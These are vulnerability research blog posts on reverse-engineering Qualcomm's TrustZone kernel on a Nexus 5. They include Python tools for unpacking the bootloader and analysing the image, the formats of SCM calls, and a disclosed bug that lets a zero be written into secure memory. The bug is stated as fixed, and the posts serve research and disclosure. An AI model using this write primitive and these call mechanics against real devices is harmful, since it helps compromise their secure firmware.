After downloading the factory image and grepping for strings related to TrustZone, it quickly became apparent that the bootloader image contains the wanted code.

However, there was still a minor problem to solve here - the bootloader image was in an unknown format (although maybe some Google-fu could reveal the answers needed). Regardless, opening the file with a hex-editor and guessing at its structure revealed that the format is actually quite simple:

The bootloader file has the following structure:

Magic value ("BOOTLDR!") - 8 bytes
The number of images - 4 bytes
The offset from the beginning of the file to the beginning of the image's data - 4 bytes
The total size of the data contained in the images - 4 bytes
An array with a number of entries matching the "number of images" field, above. Each entry in the array has two fields:

The image name - 64 bytes (zero padded)
The image length - 4 bytes

As you can see in the image above, the bootloader image contains an image called "tz", which is the image we're after. In order to unpack this file, I've written a small python script (available here) which receives a bootloader image and unpacks all of the files contained within it.
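For illustration, here's a minimal Python sketch of an unpacker for the layout described above. It isn't the linked script, just my own reconstruction from the field list, and it assumes that the integer fields are little-endian and that the images' data is stored back to back, in the same order as the entries in the array, starting at the data offset given in the header. The build_bootloader helper only exists to produce test input.

```python
import struct

MAGIC = b"BOOTLDR!"
HEADER = struct.Struct("<8sIII")  # magic, number of images, data offset, total data size
ENTRY = struct.Struct("<64sI")    # zero-padded image name, image length


def unpack_bootloader(blob):
    """Split a "BOOTLDR!" container into a {image name: image bytes} dict."""
    magic, count, data_offset, total_size = HEADER.unpack_from(blob, 0)
    if magic != MAGIC:
        raise ValueError("not a BOOTLDR! image")
    images = {}
    entry_pos = HEADER.size
    data_pos = data_offset
    for _ in range(count):
        raw_name, length = ENTRY.unpack_from(blob, entry_pos)
        entry_pos += ENTRY.size
        name = raw_name.rstrip(b"\x00").decode("ascii")
        images[name] = blob[data_pos:data_pos + length]
        data_pos += length
    if data_pos - data_offset != total_size:
        raise ValueError("image lengths do not add up to the total data size")
    return images


def build_bootloader(images):
    """Build a container in the same (assumed) layout; handy for testing."""
    table = b"".join(ENTRY.pack(name.encode("ascii"), len(data))
                     for name, data in images.items())
    payload = b"".join(images.values())
    header = HEADER.pack(MAGIC, len(images), HEADER.size + len(table), len(payload))
    return header + table + payload
```

With a real factory image, unpack_bootloader(open(path, "rb").read())["tz"] would return the TrustZone image (path being wherever the bootloader image was saved).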

After extracting the image, and comparing it to the one extracted previously from the device, I verified that they were indeed identical. So I guess this means we can now move on to examine the TrustZone image.

Fixing up the TrustZone image

First of all, examining the file reveals that it is in fact an ELF file, which is pretty good news! This means that the memory segments and their mapped addresses should be available to us.

After opening the file with IDA Pro and letting the auto-analysis run for a while, I wanted to start reversing the file. However, surprisingly, there seemed to be a lot of branches to unmapped addresses (or rather, addresses that weren't contained within the "tz" binary).

After taking a closer look, it seemed as though all the absolute branches that pointed to invalid addresses were within the first code segment of the file, and they were pointing into high addresses that weren't mapped. Also, there were no absolute branches to the address of that first code segment.

This seemed a little fishy... So how about we take a look at the ELF file's structure? Executing readelf reveals the following:

There's a NULL segment mapped to a higher address, which actually corresponds with the address range to which the invalid absolute branches were pointing! The guys over at Qualcomm are sneaky pandas :)

Anyway, I made a rather safe guess, which is that the first code segment is in fact mapped to the wrong address, and should actually be mapped to the higher address - 0xFE840000. So naturally, I wanted to rebase the segment using IDA's rebase feature, but lo and behold! This causes IDA to crash spectacularly:

I'm actually not sure if this was intended as an anti-reversing feature by Qualcomm, or if the NULL segment is just a result of their internal build process, but this can be easily bypassed by fixing the ELF file manually. All that's required is to move the NULL segment to an unused address (since it is ignored by IDA anyway), and to move the first code segment from its wrong address (0xFC86000) to the correct address (0xFE840000), like so:

Now, after loading the image in IDA, all the absolute branches are valid! This means we can move on to analyse the image.
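The manual fix boils down to rewriting a couple of program header fields, so here's a Python sketch of it. It assumes a little-endian ELF32 file, and it shifts p_paddr by the same delta as p_vaddr, which is my own choice. The NULL segment's actual address only appeared in the readelf output, so in the test below both its address and its "unused" destination (0x10000000) are placeholders.

```python
import struct


def rebase_segments(elf, moves):
    """Rewrite program-header addresses of a little-endian ELF32 image in place.

    `elf` is a bytearray and `moves` maps a segment's current p_vaddr to its
    new p_vaddr; p_paddr is shifted by the same delta. Returns the number of
    program headers that were changed.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF file")
    phoff, = struct.unpack_from("<I", elf, 28)
    phentsize, phnum = struct.unpack_from("<HH", elf, 42)
    changed = 0
    for i in range(phnum):
        entry = phoff + i * phentsize
        p_vaddr, p_paddr = struct.unpack_from("<II", elf, entry + 8)
        if p_vaddr not in moves:
            continue
        new_vaddr = moves[p_vaddr]
        new_paddr = (p_paddr + new_vaddr - p_vaddr) & 0xFFFFFFFF
        struct.pack_into("<II", elf, entry + 8, new_vaddr, new_paddr)
        changed += 1
    return changed
```

Each program header is matched against its original address, so a single call can move the NULL segment out of the way and move the code segment into the freed range.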

Analysing the TrustZone image

First, it should be noted that the TrustZone image is a rather large (285.5 KB) binary file, with very few strings, and with no public documentation. Moreover, the TrustZone system consists of a full kernel with capabilities such as executing applications, and much more. So... it's not clear where we should start, as reversing the whole binary would probably take far too long.

Since we would like to attack the TrustZone kernel from the application processor, the largest attack surface would probably be the secure monitor calls which enable the "Normal World" to interact with the "Secure World".

It should be noted, of course, that there are other vectors with which we can interact with the TrustZone, such as shared memory or maybe even interrupt handling, but since these pose a much smaller attack-surface, it is probably better to start by analysing the SMC calls.

So how do we find where the TrustZone kernel handles the SMC calls? First of all, let's recall that when executing an SMC call, similarly to the handling of SVC calls (that is, regular system calls in the "Normal World"), the "Secure World" must register the address of the vector to which the processor will jump when such an instruction is encountered.

The "Secure World"'s equivalent is the MVBAR (Monitor Vector Base Address Register), which provides the address of the vector containing the handling functions for the different events which are handled by the processor in "Secure World".

Accessing the MVBAR is done using the MRC/MCR opcodes, with the following operands:

So this means we can simply search for an MCR opcode with the following operands in the TrustZone image, and we should be able to find the "Monitor Vector". Indeed, searching for the opcode in IDA returns the following match:

As you can see, the address of the "start" symbol (which is, by the way, the only exported symbol), is loaded into the MVBAR.
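This search is also easy to script. Here's a Python sketch that computes the A32 encoding of MCR p15, 0, <Rt>, c12, c0, 1 (a write to the MVBAR) for every general-purpose register, and scans an image for it. It assumes the code is in ARM (not Thumb) state, little-endian and 4-byte aligned; a Thumb-2 encoded write would not be found by this sketch.

```python
import struct


def mcr_encoding(rt, coproc=15, opc1=0, crn=12, crm=0, opc2=1, cond=0xE):
    """A32 encoding of MCR <coproc>, <opc1>, <Rt>, <CRn>, <CRm>, <opc2>.

    The defaults describe the MVBAR write (p15, 0, c12, c0, 1), always executed.
    """
    return (cond << 28 | 0b1110 << 24 | opc1 << 21 | crn << 16 |
            rt << 12 | coproc << 8 | opc2 << 5 | 1 << 4 | crm)


def find_mvbar_writes(image):
    """Return (file offset, Rt) for every aligned word that writes the MVBAR."""
    targets = {mcr_encoding(rt): rt for rt in range(15)}  # R0-R14
    hits = []
    for off in range(0, len(image) - 3, 4):
        word, = struct.unpack_from("<I", image, off)
        if word in targets:
            hits.append((off, targets[word]))
    return hits
```

For instance, mcr_encoding(0) yields 0xEE0C0F30, the encoding of MCR p15, 0, R0, c12, c0, 1.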

According to the ARM documentation, the "Monitor Vector" has the following structure:

Which means that if we look at the "start" symbol mentioned earlier, we can assign the following names to the addresses in that table:

Now, we can analyse the SMC_VECTOR_HANDLER function. Actually, this function is responsible for quite a few tasks; first, it saves all the state registers and the return address in a predefined address (in the "Secure World"), then, it switches over the stack to a preallocated area (also in the "Secure World"). Finally, after performing the necessary preparations, it goes on to analyse the operation requested by the user and operate according to it.
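Naming the table's slots can be scripted too. The sketch below assumes the ARMv7 Security Extensions layout of the monitor vector table (offsets 0x00 and 0x04 unused, 0x08 SMC, 0x0C Prefetch Abort, 0x10 Data Abort, 0x14 unused, 0x18 IRQ, 0x1C FIQ), and that each slot holds a plain ARM-state B or BL instruction; slots holding anything else are reported as None. The slot names are my own, not symbols from the image.

```python
import struct

# Monitor vector table slots, one 4-byte instruction each (ARMv7 Security Extensions).
SLOT_NAMES = ["unused_0x00", "unused_0x04", "smc", "prefetch_abort",
              "data_abort", "unused_0x14", "irq", "fiq"]


def decode_branch(word, addr):
    """Return the target of an A32 B/BL instruction at `addr`, or None if `word` isn't one."""
    if word >> 28 == 0xF or (word >> 25) & 0b111 != 0b101:
        return None                           # cond 0xF with this opcode is BLX, not B/BL
    imm24 = word & 0xFFFFFF
    if imm24 & 0x800000:                      # sign-extend the 24-bit word offset
        imm24 -= 1 << 24
    return (addr + 8 + (imm24 << 2)) & 0xFFFFFFFF  # PC reads as addr + 8 in ARM state


def name_monitor_vector(image, image_base, mvbar):
    """Map each slot name to its branch target, given the image, its load address and MVBAR."""
    table_off = mvbar - image_base
    targets = {}
    for index, name in enumerate(SLOT_NAMES):
        word, = struct.unpack_from("<I", image, table_off + 4 * index)
        targets[name] = decode_branch(word, mvbar + 4 * index)
    return targets
```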

Since the code to issue SMCs is present in Qualcomm's MSM branch of the Linux kernel, we can take a look at the format of commands which the "Normal World" can issue to the "Secure World".

SMC and SCM

Confusingly, Qualcomm chose to name the channel through which the "Normal World" interacts with the "Secure World" via SMC opcodes - SCM (Secure Channel Manager).

Anyway, as I've mentioned in the previous blog post, the "qseecom" driver is used to communicate with the "Secure World" using SCMs.

The documentation provided by Qualcomm in the relevant source files is quite extensive, and is enough to get quite a good grip on the format of SCM commands.

In short, SCM commands fall into one of two categories:

Regular SCM Call - These calls are used when there is information that needs to be passed from the "Normal World" to the "Secure World", which is needed in order to service the SCM call. The kernel populates the following structure:

And the TrustZone kernel, after servicing the SCM call, writes the response back to the "scm_response" structure:

In order to allocate and fill these structures, the kernel may call the wrapping function "scm_call", which receives pointers to kernel-space buffers containing the data to be sent, the location to which the data should be returned, and most importantly, the service identifier and command identifier.

Each SCM call has a "category", which means which TrustZone kernel subsystem is responsible for handling that call. This is denoted by the service identifier. The command identifier is the code which specifies, within a given service, which command was requested.
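Here's a Python sketch of the buffer that "scm_call" lays out, as I understand it from the MSM kernel's scm.c: an "scm_command" header (len, buf_offset, resp_hdr_offset, id) followed by the request data, followed by an "scm_response" header (len, buf_offset, is_complete) and room for the response. The field order, the little-endian 32-bit fields and the (svc_id << 10) | cmd_id packing of "id" are assumptions you should check against the kernel tree you actually build.

```python
import struct

# Assumed layouts (little-endian u32 fields), following the MSM kernel's scm.c.
SCM_COMMAND_HDR = struct.Struct("<4I")   # len, buf_offset, resp_hdr_offset, id
SCM_RESPONSE_HDR = struct.Struct("<3I")  # len, buf_offset, is_complete


def build_scm_command(svc_id, cmd_id, cmd_buf, resp_size):
    """Lay out an scm_command, its request data and room for the scm_response."""
    buf_offset = SCM_COMMAND_HDR.size            # request data follows the header
    resp_hdr_offset = buf_offset + len(cmd_buf)  # response header follows the data
    total_len = SCM_COMMAND_HDR.size + len(cmd_buf) + SCM_RESPONSE_HDR.size + resp_size
    header = SCM_COMMAND_HDR.pack(total_len, buf_offset, resp_hdr_offset,
                                  (svc_id << 10) | cmd_id)
    # The response header and buffer start zeroed; the TrustZone kernel fills them in.
    return header + bytes(cmd_buf) + bytes(SCM_RESPONSE_HDR.size + resp_size)


def response_is_complete(command, resp_hdr_offset):
    """Read the is_complete flag of the response header embedded in the buffer."""
    _, _, is_complete = SCM_RESPONSE_HDR.unpack_from(command, resp_hdr_offset)
    return bool(is_complete)
```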

After the "scm_call" function allocates and populates the "scm_command" and "scm_response" buffers, it calls an internal "__scm_call" function which flushes all the caches (inner and outer caches), and calls the "smc" function.

This last function actually executes the SMC opcode, transferring control to the TrustZone kernel, like so:

Note that R0 is set to 1, R1 is set to point to a local kernel stack address, which is used as a "context ID" for that call, and R2 is set to point to the physical address of the allocated "scm_command" structure.

This "magic" value set in R0 indicates that this is a regular SCM call, using the "scm_command" structure. However, for certain commands where less data is required, it would be rather wasteful to allocate all these data structures for no reason. In order to address this issue, another form of SCM calls was introduced.

Atomic SCM Call - For calls in which the number of arguments is quite low (up to four arguments), there exists an alternate way to request an SCM call.

There are four wrapper functions, "scm_call_atomic_[1-4]", which correspond to the number of arguments requested. These functions can be called in order to directly issue an SMC for an SCM call with the given service and command IDs, and the given arguments.

Here's the code for the "scm_call_atomic1" function:

Where SCM_ATOMIC is defined as:

Note that both the service ID and the command ID are encoded into R0, along with the number of arguments in the call (in this case, 1). This is instead of the previous "magic" value of 1 used for regular SCM calls.

This different value in R0 indicates to the TrustZone kernel that the following SCM call is an atomic call, which means that the arguments will be passed in using R2-R5 (and not using a structure pointed to by R2).
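To see what ends up in the registers, here's a Python sketch of the R0 computation. The constants mirror the SCM_ATOMIC macro as I recall it from the MSM kernel's scm.c (SCM_CLASS_REGISTER = 0x2 << 8, SCM_MASK_IRQS = bit 5, argument count in the low nibble), so treat them as assumptions to verify against your kernel source. Since bits 9 and 5 are always set, an atomic R0 can never be the value 1 used for regular calls.

```python
# Assumed to match the MSM kernel's SCM_ATOMIC macro; verify against your source tree.
SCM_CLASS_REGISTER = 0x2 << 8
SCM_MASK_IRQS = 1 << 5


def scm_atomic_r0(svc_id, cmd_id, nargs):
    """Compute the R0 value for an atomic SCM call."""
    return ((((svc_id << 10) | (cmd_id & 0x3FF)) << 12)
            | SCM_CLASS_REGISTER | SCM_MASK_IRQS | (nargs & 0xF)) & 0xFFFFFFFF


def atomic_call_registers(svc_id, cmd_id, context_id_addr, *args):
    """Return [R0, R1, R2, ...] as set up by scm_call_atomic_[1-4].

    R1 holds the address of a kernel stack variable used as the context ID,
    and the arguments follow in R2 onwards.
    """
    if not 1 <= len(args) <= 4:
        raise ValueError("atomic SCM calls take between one and four arguments")
    return [scm_atomic_r0(svc_id, cmd_id, len(args)), context_id_addr, *args]
```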

Analysing SCM calls

Now that we understand how SCM calls work, and we've found the handling function in the TrustZone kernel which is used to handle these SCM calls, we can begin disassembling the SCM calls to try and find a vulnerability in one of them.

I'll skip over most of the analysis of the SCM handling function, since most of it is boilerplate handling of user input, etc. However, after switching the stack over to the TrustZone area and saving the original registers with which the call was performed, the handling function goes on to process the service ID and the command ID in order to see which internal handling function should be called.

In order to easily map between the service and command IDs and the relevant handling function, a static list is compiled into the TrustZone image's data segment, and is referenced by the SCM handling function. Here is a short snippet from the list:

As you can see, the list has the following structure:

Pointer to the string containing the name of the SCM function
"Type" of call
Pointer to the handling function
Number of arguments
Size of each argument (one DWORD for each argument)
The Service ID and Command ID, concatenated into a single DWORD - For example, the "tz_blow_sw_fuse" function above, has the type 0x2002 which means it belongs to the service ID 0x20 and its command ID is 0x02.

Now all that's left is to start disassembling each of these functions, and hope to find an exploitable bug.

The Bug!

So after poring over all of the aforementioned SMC calls (all 69 of them), I finally arrived at the following function:

Normally, when an SCM command is called using the regular SCM call mechanism, R0 will contain the "result address" which points to the "scm_response" buffer which was allocated by the kernel, but which is also validated by the TrustZone kernel to make sure it is actually a physical address within an "allowed" range - that is, a physical address which corresponds to the Linux kernel's memory, and not, for example, a memory location within the TrustZone binary.

This check is performed using an internal function which I will cover in more detail in the next blog post (so stay posted!).

But what happens if we use an atomic SCM call to execute a function? In that case, the "result address" used is the first argument passed by the atomic call.

Now - can you see the bug in the function above?

As opposed to other SCM handling functions, this function fails to validate the value in R0, the "result address", so if we pass in:

R1 as a non-zero value (in order to pass the first branch)
The fourth argument (which is passed in at var_1C above) is non-zero
R0 as any physical address, including an address within the range of the TrustZone address space

The function will reach the left-most branch in the function above, and write a zero DWORD at the address contained in R0.
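To make the missing check explicit, here's a toy Python model of the logic described above. It isn't a decompilation: only the three conditions listed come from the analysis, the secure range bounds are placeholders rather than the real memory map, and is_allowed_address is a hypothetical stand-in for the internal validation function that the other SCM handlers call.

```python
# Hypothetical placeholder bounds standing in for the TrustZone kernel's own memory.
SECURE_START, SECURE_END = 0xFE800000, 0xFE900000


def is_allowed_address(addr):
    """Stand-in for the internal validation: reject addresses inside the secure range."""
    return not (SECURE_START <= addr < SECURE_END)


def handle_call(memory, r0, r1, arg4, validate_result_address):
    """Model of the handler; returns True if a zero DWORD was written at r0."""
    if r1 == 0 or arg4 == 0:
        return False                  # the left-most (zero-writing) branch isn't reached
    if validate_result_address and not is_allowed_address(r0):
        return False                  # what the other SCM handlers would do
    memory[r0] = 0                    # the vulnerable handler writes without validating r0
    return True
```

Calling handle_call with validate_result_address=False and an R0 inside the secure range models the bug: the zero is written into TrustZone memory.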

Responsible Disclosure

I'd like to point out that I responsibly disclosed this vulnerability to Qualcomm eleven months ago, and the issue has been fixed by them (amazingly fast!). I'll share a detailed timeline and explanation in the next blog post, but I'd like to point out that the people at Qualcomm have been very responsive and a pleasure to work with.

What's next?

In the next blog post I will share a detailed (and quite complex!) exploit for the vulnerability described above, which enables full code execution within the TrustZone kernel. I will also publish the full exploit code, so stay tuned!

Also, since this is only my second blog post, I'm really looking for some (any) input, specifically:

What should I write more (or less) about?
Blog design issues
Research ideas :)

Getting arbitrary code execution in TrustZone's kernel from any context

2015-03-28T03:02:00.001+03:00

(All the vulnerabilities have been responsibly disclosed and fixed. I will post the CVE IDs and timelines in the following posts.)

What's the Goal?

Transcendence. From Android, that is.

This is going to be a series of blog posts detailing a chain of vulnerabilities that I've discovered which will enable us to escalate our privileges from any user up to the highest privilege of all - executing our code within TrustZone itself.

Since I only have my personal Android device, a Nexus 5 powered by a Snapdragon 800 SoC, I will focus on the TrustZone platform present on my device - Qualcomm's TrustZone implementation.

It should be noted that Qualcomm's TrustZone platform is present on all devices powered by Qualcomm SoCs; however, Qualcomm also allows OEMs to make modifications and additions to this platform, which I will go into in more detail in later blog posts.

Also, I believe Qualcomm's TrustZone implementation is an objectively good target, since the Snapdragon SoCs are quite ubiquitous and can be found in a very wide range of devices (which isn't surprising, considering Qualcomm has a very large share of the smartphone chipset market).

Android & Security

Over the years many security mechanisms have been added to Android, and existing ones have been improved.

While the underlying security architecture hasn't changed, the defences have become quite formidable on modern devices, to the point where gaining high privileges can become quite a difficult task, often requiring more than a single vulnerability.

If you haven't already, I recommend that you read Google's "Android Security Overview", which explains the security architecture and lists most of the security mechanisms which are currently in use.

(For the rest of these blog posts, I'm going to assume that you are at least somewhat familiar with Android's security architecture).

What is TrustZone?

(First, an obligatory TrustZone schematic from ARM Ltd.)

According to ARM Ltd., TrustZone is:

"...a system-wide approach to security for a wide array of client and server computing platforms, including handsets, tablets, wearable devices and enterprise systems. Applications enabled by the technology are extremely varied but include payment protection technology, digital rights management, BYOD, and a host of secured enterprise solutions."

In short, this means TrustZone is a system which is meant to enable "secure execution" on a target device.

In order to execute secure TrustZone code, a specific processor is designated. This processor can execute both non-secure code (in the "Normal World") and secure code (in the "Secure World"). All other processors are limited to the "Normal World" only.

TrustZone is used for various purposes on Android devices, for example:

Verifying kernel integrity (TIMA)
Using the Hardware Credential Storage (used by "keystore", "dm-verity")
Secure Element Emulation for Mobile Payments
Implementing and managing Secure Boot
DRM (e.g. PlayReady)
Accessing platform hardware features (e.g. hardware entropy)

In order to secure the whole system, and not just the application processor, specific bits on the system bus are set when entering "Secure World" and unset when returning to the "Normal World".

Peripherals are able to access the state of these bits and can therefore deduce whether or not we are currently running in the "Secure World".

How does TrustZone's security model work?

ARM also has a short technical overview of how TrustZone's Secure Model works, which is worth a read.

To achieve secure execution, the boundary between TrustZone and non-TrustZone code must be defined. This is achieved by defining two "worlds" - "Secure World" (TrustZone) and "Normal World" (in our case, Android).

As you know, when in the "Normal World" there is a security boundary between code running in "User-mode" and code running in "Supervisor-mode" (Kernel-mode).

The distinction between the different modes is managed by the Current Program Status Register (CPSR):

The five mode bits (marked by "M" in the image above), control the current execution mode. In the case of the Linux kernel, User Mode (b10000) is used for regular user code, and Supervisor Mode (b10011) is used for kernel code.

And yet, there's something missing here - there's no bit to indicate which "world" is currently active. That is because there is a separate register used for that - the Secure Configuration Register (SCR):

This register is a co-processor register, in CP15 c1, which means it can be accessed using the MRC/MCR opcodes.
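As a quick reference, here's a small Python sketch that decodes the two pieces of state discussed above: the CPSR mode bits and the SCR's NS bit (bit 0). The mode encodings are the standard ARMv7 ones. Note that Monitor mode (0b10110) always executes in the "Secure World" regardless of the NS bit, which the sketch takes into account.

```python
# ARMv7 processor mode encodings (CPSR bits [4:0]).
MODES = {
    0b10000: "User",
    0b10001: "FIQ",
    0b10010: "IRQ",
    0b10011: "Supervisor",
    0b10110: "Monitor",
    0b10111: "Abort",
    0b11010: "Hyp",
    0b11011: "Undefined",
    0b11111: "System",
}

SCR_NS = 1 << 0  # SCR bit 0: set means Non-secure ("Normal World")


def cpsr_mode(cpsr):
    """Name of the execution mode encoded in the CPSR's five mode bits."""
    return MODES.get(cpsr & 0x1F, "reserved")


def world(scr, cpsr):
    """Which world the core is executing in, given the SCR and CPSR values."""
    if cpsr_mode(cpsr) == "Monitor":
        return "Secure World"         # Monitor mode is always Secure
    return "Normal World" if scr & SCR_NS else "Secure World"
```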

As with the CPSR register, the "Normal World" cannot modify the SCR register directly. It can, however, execute an SMC opcode, which is the equivalent of a SWI for regular supervisor mode calls. SMC is short for Secure Monitor Call, and is the opcode which can be used to issue requests directly to the TrustZone kernel.

Also, it should be noted that the SMC opcode can only be called from a supervisor context, which means that regular user code cannot use the SMC opcode.

In order to actually call TrustZone related functionality, the supervisor code, in our case, the Linux kernel, must register some sort of service which can be used to call the relevant SMC calls when needed.

In the case of Qualcomm, this is achieved by a device driver called "qseecom" - short for Qualcomm Secure Execution Environment Communication. We'll talk more about this driver in later blog posts, so hang tight.

Putting it all together

So the road ahead is pretty long - in order to get to TrustZone code execution from a user-mode Android application with no permissions, we'll need the following privilege escalation vulnerabilities:

Escalation from an Android application with no permissions to a privileged Android user.
Escalation from a privileged Android user to code execution in the Linux kernel.
Escalation from the Linux kernel to code execution in the TrustZone kernel.

So if this seems like it might interest you, keep reading!

In the next blog post, I'll cover more details about Qualcomm's TrustZone implementation, and the vulnerability I discovered and exploited within its kernel.

__attribute__((constructor))

2014-10-25T00:55:00.000+03:00

I just started this blog to talk about a few things I like (and I hope you will too!).

I'll be focusing on Android, Mobile Security, and anything else security-related that I fiddle with in my spare time.

As embargoes expire, I will share vulnerabilities that I have discovered, detailed exploits for those I find interesting, and a few security research tools that I've developed.

Feel free to contact me by leaving a message on the blog or by emailing me at laginimaineb (at) gmail. If you have an idea for an interesting research topic that you think I should cover - I'm always happy to hear about it (especially if it's Android-related).

P.S - I might also share a few pictures of my dog. So there's that.